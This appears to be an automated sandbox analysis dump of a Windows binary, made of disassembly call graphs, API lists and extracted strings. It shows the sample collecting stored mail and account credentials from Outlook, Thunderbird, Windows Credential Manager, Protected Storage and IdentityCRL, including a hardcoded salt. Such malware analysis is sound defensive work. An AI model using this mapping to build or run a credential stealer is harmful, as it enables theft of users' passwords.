403c86 33405->33407 33406->33404 33485 4036e5 33407->33485 33410 4036e5 27 API calls 33411 403c9a 33410->33411 33412 4036e5 27 API calls 33411->33412 33413 403ca4 33412->33413 33414 4036e5 27 API calls 33413->33414 33415 403cae 33414->33415 33497 4085d2 33415->33497 33423 403ce5 33424 403cf7 33423->33424 33680 402bd1 40 API calls 33423->33680 33545 410a9c RegOpenKeyExA 33424->33545 33427 403d0a 33428 403d1c 33427->33428 33681 402bd1 40 API calls 33427->33681 33546 402c5d 33428->33546 33432 4070ae GetVersionExA 33433 403d31 33432->33433 33564 410a9c RegOpenKeyExA 33433->33564 33435 403d51 33436 403d61 33435->33436 33682 402b22 47 API calls 33435->33682 33565 410a9c RegOpenKeyExA 33436->33565 33439 403d87 33440 403d97 33439->33440 33683 402b22 47 API calls 33439->33683 33566 410a9c RegOpenKeyExA 33440->33566 33443 403dbd 33444 403dcd 33443->33444 33684 402b22 47 API calls 33443->33684 33567 410808 33444->33567 33448 404785 FreeLibrary 33449 403de8 33448->33449 33571 402fdb 33449->33571 33452 402fdb 34 API calls 33453 403e00 33452->33453 33587 4032b7 33453->33587 33462 403e3b 33463 403e73 33462->33463 33464 403e46 _mbscpy 33462->33464 33634 40fb00 33463->33634 33686 40f334 334 API calls 33464->33686 33474 410807 33473->33474 33475 4107fc FreeLibrary 33473->33475 33474->33254 33475->33474 33477 404785 FreeLibrary 33476->33477 33478 40473b LoadLibraryA 33477->33478 33479 40474c GetProcAddress 33478->33479 33482 40476e 33478->33482 33480 404764 33479->33480 33479->33482 33480->33482 33481 404781 33481->33254 33482->33481 33483 404785 FreeLibrary 33482->33483 33483->33481 33484->33253 33486 4037c5 33485->33486 33487 4036fb 33485->33487 33486->33410 33687 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33487->33687 33489 40370e 33489->33486 33490 403716 strchr 33489->33490 33490->33486 33491 403730 33490->33491 33688 4021b6 memset 33491->33688 33493 40373f _mbscpy _mbscpy strlen 33494 4037a4 _mbscpy 33493->33494 33495 403789 sprintf 33493->33495 33689 4023e5 16 
API calls 33494->33689 33495->33494 33498 4085e2 33497->33498 33690 4082cd 11 API calls 33498->33690 33502 408600 33503 403cba 33502->33503 33504 40860b memset 33502->33504 33515 40821d 33503->33515 33693 410b62 RegEnumKeyExA 33504->33693 33506 4086d2 RegCloseKey 33506->33503 33508 408637 33508->33506 33509 40865c memset 33508->33509 33694 410a9c RegOpenKeyExA 33508->33694 33697 410b62 RegEnumKeyExA 33508->33697 33695 410add RegQueryValueExA 33509->33695 33512 408694 33696 40848b 10 API calls 33512->33696 33514 4086ab RegCloseKey 33514->33508 33698 410a9c RegOpenKeyExA 33515->33698 33517 40823f 33518 403cc6 33517->33518 33519 408246 memset 33517->33519 33527 4086e0 33518->33527 33699 410b62 RegEnumKeyExA 33519->33699 33521 4082bf RegCloseKey 33521->33518 33523 40826f 33523->33521 33700 410a9c RegOpenKeyExA 33523->33700 33701 4080ed 11 API calls 33523->33701 33702 410b62 RegEnumKeyExA 33523->33702 33526 4082a2 RegCloseKey 33526->33523 33703 4045db 33527->33703 33530 4088ef 33711 404656 33530->33711 33532 40872d 33532->33530 33535 408737 wcslen 33532->33535 33534 40872b CredEnumerateW 33534->33532 33535->33530 33541 40876a 33535->33541 33536 40877a wcsncmp 33536->33541 33538 404734 3 API calls 33538->33541 33539 404785 FreeLibrary 33539->33541 33540 408812 memset 33540->33541 33542 40883c memcpy wcschr 33540->33542 33541->33530 33541->33536 33541->33538 33541->33539 33541->33540 33541->33542 33543 4088c3 LocalFree 33541->33543 33714 40466b _mbscpy 33541->33714 33542->33541 33543->33541 33544 410a9c RegOpenKeyExA 33544->33423 33545->33427 33715 410a9c RegOpenKeyExA 33546->33715 33548 402c7a 33549 402da5 33548->33549 33550 402c87 memset 33548->33550 33549->33432 33716 410b62 RegEnumKeyExA 33550->33716 33552 402d9c RegCloseKey 33552->33549 33553 410b1e 3 API calls 33554 402ce4 memset sprintf 33553->33554 33717 410a9c RegOpenKeyExA 33554->33717 33556 402d28 33557 402d3a sprintf 33556->33557 33718 402bd1 40 API calls 33556->33718 33719 410a9c RegOpenKeyExA 33557->33719 
33562 402cb2 33562->33552 33562->33553 33563 402d9a 33562->33563 33720 402bd1 40 API calls 33562->33720 33721 410b62 RegEnumKeyExA 33562->33721 33563->33552 33564->33435 33565->33439 33566->33443 33568 410816 33567->33568 33569 4107f1 FreeLibrary 33568->33569 33570 403ddd 33569->33570 33570->33448 33722 410a9c RegOpenKeyExA 33571->33722 33573 402ff9 33574 403006 memset 33573->33574 33575 40312c 33573->33575 33723 410b62 RegEnumKeyExA 33574->33723 33575->33452 33577 403122 RegCloseKey 33577->33575 33578 410b1e 3 API calls 33579 403058 memset sprintf 33578->33579 33724 410a9c RegOpenKeyExA 33579->33724 33581 403033 33581->33577 33581->33578 33582 4030a2 memset 33581->33582 33584 410b62 RegEnumKeyExA 33581->33584 33585 4030f9 RegCloseKey 33581->33585 33726 402db3 26 API calls 33581->33726 33725 410b62 RegEnumKeyExA 33582->33725 33584->33581 33585->33581 33588 4032d5 33587->33588 33589 4033a9 33587->33589 33727 4021b6 memset 33588->33727 33602 4034e4 memset memset 33589->33602 33591 4032e1 33728 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33591->33728 33593 4032ea 33594 4032f8 memset GetPrivateProfileSectionA 33593->33594 33729 4023e5 16 API calls 33593->33729 33594->33589 33599 40332f 33594->33599 33596 40339b strlen 33596->33589 33596->33599 33598 403350 strchr 33598->33599 33599->33589 33599->33596 33730 4021b6 memset 33599->33730 33731 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33599->33731 33732 4023e5 16 API calls 33599->33732 33603 410b1e 3 API calls 33602->33603 33604 40353f 33603->33604 33605 40357f 33604->33605 33606 403546 _mbscpy 33604->33606 33610 403985 33605->33610 33733 406d55 strlen _mbscat 33606->33733 33608 403565 _mbscat 33734 4033f0 19 API calls 33608->33734 33735 40466b _mbscpy 33610->33735 33614 4039aa 33615 4039ff 33614->33615 33736 40f460 memset memset 33614->33736 33757 40f6e2 33614->33757 33773 4038e8 21 API calls 33614->33773 33617 404785 FreeLibrary 33615->33617 33618 403a0b 33617->33618 33619 4037ca memset 
memset 33618->33619 33781 444551 memset 33619->33781 33621 4038e2 33621->33462 33685 40f334 334 API calls 33621->33685 33624 40382e 33625 406f06 2 API calls 33624->33625 33626 403843 33625->33626 33627 406f06 2 API calls 33626->33627 33628 403855 strchr 33627->33628 33629 403884 _mbscpy 33628->33629 33630 403897 strlen 33628->33630 33631 4038bf _mbscpy 33629->33631 33630->33631 33632 4038a4 sprintf 33630->33632 33793 4023e5 16 API calls 33631->33793 33632->33631 33635 44b090 33634->33635 33636 40fb10 RegOpenKeyExA 33635->33636 33637 403e7f 33636->33637 33638 40fb3b RegOpenKeyExA 33636->33638 33648 40f96c 33637->33648 33639 40fb55 RegQueryValueExA 33638->33639 33640 40fc2d RegCloseKey 33638->33640 33641 40fc23 RegCloseKey 33639->33641 33642 40fb84 33639->33642 33640->33637 33641->33640 33643 404734 3 API calls 33642->33643 33644 40fb91 33643->33644 33644->33641 33645 40fc19 LocalFree 33644->33645 33646 40fbdd memcpy memcpy 33644->33646 33645->33641 33798 40f802 11 API calls 33646->33798 33649 4070ae GetVersionExA 33648->33649 33650 40f98d 33649->33650 33651 4045db 7 API calls 33650->33651 33652 40f9a9 33651->33652 33655 40fae6 33652->33655 33656 40fa13 memset WideCharToMultiByte 33652->33656 33653 404656 FreeLibrary 33654 403e85 33653->33654 33660 4442ea memset 33654->33660 33655->33653 33656->33652 33657 40fa43 _strnicmp 33656->33657 33657->33652 33658 40fa5b WideCharToMultiByte 33657->33658 33658->33652 33659 40fa88 WideCharToMultiByte 33658->33659 33659->33652 33661 410dbb 9 API calls 33660->33661 33662 444329 33661->33662 33799 40759e strlen strlen 33662->33799 33667 410dbb 9 API calls 33668 444350 33667->33668 33669 40759e 3 API calls 33668->33669 33670 44435a 33669->33670 33671 444212 65 API calls 33670->33671 33672 444366 memset memset 33671->33672 33673 410b1e 3 API calls 33672->33673 33674 4443b9 ExpandEnvironmentStringsA strlen 33673->33674 33675 4443f4 _strcmpi 33674->33675 33676 4443e5 33674->33676 33677 403e91 33675->33677 33678 44440c 33675->33678 
33676->33675 33677->33254 33679 444212 65 API calls 33678->33679 33679->33677 33680->33424 33681->33428 33682->33436 33683->33440 33684->33444 33685->33462 33686->33463 33687->33489 33688->33493 33689->33486 33691 40841c 33690->33691 33692 410a9c RegOpenKeyExA 33691->33692 33692->33502 33693->33508 33694->33508 33695->33512 33696->33514 33697->33508 33698->33517 33699->33523 33700->33523 33701->33526 33702->33523 33704 404656 FreeLibrary 33703->33704 33705 4045e3 LoadLibraryA 33704->33705 33706 404651 33705->33706 33707 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33705->33707 33706->33530 33706->33532 33706->33534 33708 40463d 33707->33708 33709 404643 33708->33709 33710 404656 FreeLibrary 33708->33710 33709->33706 33710->33706 33712 403cd2 33711->33712 33713 40465c FreeLibrary 33711->33713 33712->33544 33713->33712 33714->33541 33715->33548 33716->33562 33717->33556 33718->33557 33719->33562 33720->33562 33721->33562 33722->33573 33723->33581 33724->33581 33725->33581 33726->33581 33727->33591 33728->33593 33729->33594 33730->33598 33731->33599 33732->33599 33733->33608 33734->33605 33735->33614 33774 4078ba 33736->33774 33739 4078ba _mbsnbcat 33740 40f5a3 RegOpenKeyExA 33739->33740 33741 40f5c3 RegQueryValueExA 33740->33741 33742 40f6d9 33740->33742 33743 40f6d0 RegCloseKey 33741->33743 33744 40f5f0 33741->33744 33742->33614 33743->33742 33744->33743 33745 40f675 33744->33745 33778 40466b _mbscpy 33744->33778 33745->33743 33779 4012ee strlen 33745->33779 33747 40f611 33749 404734 3 API calls 33747->33749 33754 40f616 33749->33754 33750 40f69e RegQueryValueExA 33750->33743 33751 40f6c1 33750->33751 33751->33743 33752 40f66a 33753 404785 FreeLibrary 33752->33753 33753->33745 33754->33752 33755 40f661 LocalFree 33754->33755 33756 40f645 memcpy 33754->33756 33755->33752 33756->33755 33780 40466b _mbscpy 33757->33780 33759 40f6fa 33760 4045db 7 API calls 33759->33760 33761 40f708 33760->33761 33763 404734 3 API calls 33761->33763 
33767 40f7e2 33761->33767 33762 404656 FreeLibrary 33764 40f7f1 33762->33764 33768 40f715 33763->33768 33765 404785 FreeLibrary 33764->33765 33766 40f7fc 33765->33766 33766->33614 33767->33762 33768->33767 33769 40f797 WideCharToMultiByte 33768->33769 33770 40f7b8 strlen 33769->33770 33771 40f7d9 LocalFree 33769->33771 33770->33771 33772 40f7c8 _mbscpy 33770->33772 33771->33767 33772->33771 33773->33614 33775 4078e6 33774->33775 33776 4078c7 _mbsnbcat 33775->33776 33777 4078ea 33775->33777 33776->33775 33777->33739 33778->33747 33779->33750 33780->33759 33794 410a9c RegOpenKeyExA 33781->33794 33783 44458b 33784 40381a 33783->33784 33795 410add RegQueryValueExA 33783->33795 33784->33621 33792 4021b6 memset 33784->33792 33786 4445a4 33787 4445dc RegCloseKey 33786->33787 33796 410add RegQueryValueExA 33786->33796 33787->33784 33789 4445c1 33789->33787 33797 444879 30 API calls 33789->33797 33791 4445da 33791->33787 33792->33624 33793->33621 33794->33783 33795->33786 33796->33789 33797->33791 33798->33645 33800 4075c9 33799->33800 33801 4075bb _mbscat 33799->33801 33802 444212 33800->33802 33801->33800 33819 407e9d 33802->33819 33805 44424d 33806 444274 33805->33806 33808 444258 33805->33808 33827 407ef8 33805->33827 33807 407e9d 9 API calls 33806->33807 33816 4442a0 33807->33816 33840 444196 52 API calls 33808->33840 33810 407ef8 9 API calls 33810->33816 33811 4442ce 33837 407f90 33811->33837 33815 407f90 FindClose 33817 4442e4 33815->33817 33816->33810 33816->33811 33818 444212 65 API calls 33816->33818 33841 407e62 strcmp strcmp 33816->33841 33817->33667 33818->33816 33820 407f90 FindClose 33819->33820 33821 407eaa 33820->33821 33822 406f06 2 API calls 33821->33822 33823 407ebd strlen strlen 33822->33823 33824 407ee1 33823->33824 33825 407eea 33823->33825 33842 4070e3 strlen _mbscat _mbscpy _mbscat 33824->33842 33825->33805 33828 407f03 FindFirstFileA 33827->33828 33829 407f24 FindNextFileA 33827->33829 33832 407f3f 33828->33832 33830 407f46 strlen strlen 
33829->33830 33831 407f3a 33829->33831 33834 407f7f 33830->33834 33835 407f76 33830->33835 33833 407f90 FindClose 33831->33833 33832->33830 33832->33834 33833->33832 33834->33805 33843 4070e3 strlen _mbscat _mbscpy _mbscat 33835->33843 33838 407fa3 33837->33838 33839 407f99 FindClose 33837->33839 33838->33815 33839->33838 33840->33805 33841->33816 33842->33825 33843->33834 33844->33267 33845->33271 33846->33277 33847->33278 33848->33284 33849->33281 33850->33276 34195 43ffc8 18 API calls 34197 4383cc 110 API calls __fprintf_l 34009 4275d3 41 API calls 34198 4153d3 22 API calls __fprintf_l 34010 444dd7 _XcptFilter 34203 4013de 15 API calls 34205 425115 111 API calls __fprintf_l 34206 43f7db 18 API calls 34209 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34013 4335ee 16 API calls __fprintf_l 34211 429fef 11 API calls 34014 444deb _exit _c_exit 34212 40bbf0 138 API calls 34017 425115 79 API calls __fprintf_l 34216 437ffa 22 API calls 34021 4021ff 14 API calls 34022 43f5fc 149 API calls 34217 40e381 9 API calls 34024 405983 40 API calls 34025 42b186 27 API calls __fprintf_l 34026 427d86 76 API calls 34027 403585 20 API calls 34029 42e58e 18 API calls __fprintf_l 34032 425115 75 API calls __fprintf_l 34034 401592 8 API calls 32934 410b92 32937 410a6b 32934->32937 32936 410bb2 32938 410a77 32937->32938 32939 410a89 GetPrivateProfileIntA 32937->32939 32942 410983 memset _itoa WritePrivateProfileStringA 32938->32942 32939->32936 32941 410a84 32941->32936 32942->32941 34221 434395 16 API calls 34036 441d9c memcmp 34223 43f79b 119 API calls 34037 40c599 43 API calls 34224 426741 87 API calls 34041 4401a6 21 API calls 34043 426da6 memcpy memset memset memcpy 34044 4335a5 15 API calls 34046 4299ab memset memset memcpy memset memset 34047 40b1ab 8 API calls 34229 425115 76 API calls __fprintf_l 34233 4113b2 18 API calls 2 library calls 34237 40a3b8 memset sprintf SendMessageA 33851 410bbc 33854 4109cf 33851->33854 33855 4109dc 33854->33855 33856 410a23 memset 
GetPrivateProfileStringA 33855->33856 33857 4109ea memset 33855->33857 33862 407646 strlen 33856->33862 33867 4075cd sprintf memcpy 33857->33867 33860 410a0c WritePrivateProfileStringA 33861 410a65 33860->33861 33863 40765a 33862->33863 33865 40765c 33862->33865 33863->33861 33864 4076a3 33864->33861 33865->33864 33868 40737c strtoul 33865->33868 33867->33860 33868->33865 34049 40b5bf memset memset _mbsicmp

                                            Control-flow Graph

                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                            APIs
                                            • memset.MSVCRT ref: 0040832F
                                            • memset.MSVCRT ref: 00408343
                                            • memset.MSVCRT ref: 0040835F
                                            • memset.MSVCRT ref: 00408376
                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                            • strlen.MSVCRT ref: 004083E9
                                            • strlen.MSVCRT ref: 004083F8
                                            • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                            • String ID: 5$H$O$b$i$}$}
                                            • API String ID: 1832431107-3760989150
                                            • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                            • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 455 407f3f-407f44 451->455 453 407f46-407f74 strlen * 2 452->453 454 407f3a call 407f90 452->454 458 407f83 453->458 459 407f76-407f81 call 4070e3 453->459 454->455 455->453 457 407f89-407f8f 455->457 461 407f86-407f88 458->461 459->461 461->457
                                            APIs
                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                            • strlen.MSVCRT ref: 00407F5C
                                            • strlen.MSVCRT ref: 00407F64
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: FileFindstrlen$FirstNext
                                            • String ID: ACD
                                            • API String ID: 379999529-620537770
                                            • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                            • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                            Control-flow Graph

                                            APIs
                                            • memset.MSVCRT ref: 00401E8B
                                            • strlen.MSVCRT ref: 00401EA4
                                            • strlen.MSVCRT ref: 00401EB2
                                            • strlen.MSVCRT ref: 00401EF8
                                            • strlen.MSVCRT ref: 00401F06
                                            • memset.MSVCRT ref: 00401FB1
                                            • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                            • memset.MSVCRT ref: 00402003
                                            • sprintf.MSVCRT ref: 00402030
                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                            • memset.MSVCRT ref: 00402086
                                            • memset.MSVCRT ref: 0040209B
                                            • strlen.MSVCRT ref: 004020A1
                                            • strlen.MSVCRT ref: 004020AF
                                            • strlen.MSVCRT ref: 004020E2
                                            • strlen.MSVCRT ref: 004020F0
                                            • memset.MSVCRT ref: 00402018
                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                            • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                            • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                            • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                              • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                            • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,74DF0A60,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404AB8
                                              • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                              • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,74DF0A60), ref: 00404ADE
                                              • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                            • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                            • DeleteObject.GDI32(?), ref: 0040D1A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                            • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                            • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                            • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                            • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                            Strings
                                            • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                            • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                            • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                            • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                            • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                            • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                            • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                            • pstorec.dll, xrefs: 00403C30
                                            • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                            • PStoreCreateInstance, xrefs: 00403C44
                                            • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                            • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: Library$AddressFreeLoadProc_mbscpy
                                            • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account

                                            Control-flow Graph

                                            control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                            • String ID: h4ND

                                            Control-flow Graph

                                            control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                            • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                            • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                              • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                              • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                            • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                            • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                              • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                              • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                              • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                              • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                            • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.3381339664.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000D.00000002.3381339664.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000D.00000002.3381339664.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
